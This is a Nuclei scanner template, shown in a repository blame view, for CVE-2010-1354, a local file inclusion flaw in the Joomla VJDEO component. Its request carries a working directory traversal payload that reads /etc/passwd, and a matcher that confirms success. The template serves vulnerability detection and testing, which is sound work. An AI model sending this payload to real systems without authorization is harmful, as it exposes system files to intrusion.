my-nuclei-templates/CVE-2010-1354.yaml

31 lines
1.0 KiB
YAML
Raw Permalink Normal View History

2021-09-02 08:03:02 +00:00
id: CVE-2010-1354
info:
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
2021-09-02 08:03:02 +00:00
reference:
- https://www.exploit-db.com/exploits/12102
- https://www.cvedetails.com/cve/CVE-2010-1354
2022-06-18 08:05:25 +00:00
- http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt
- http://secunia.com/advisories/39296
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1354
2021-09-02 08:03:02 +00:00
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-09-02 08:03:02 +00:00
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/02/14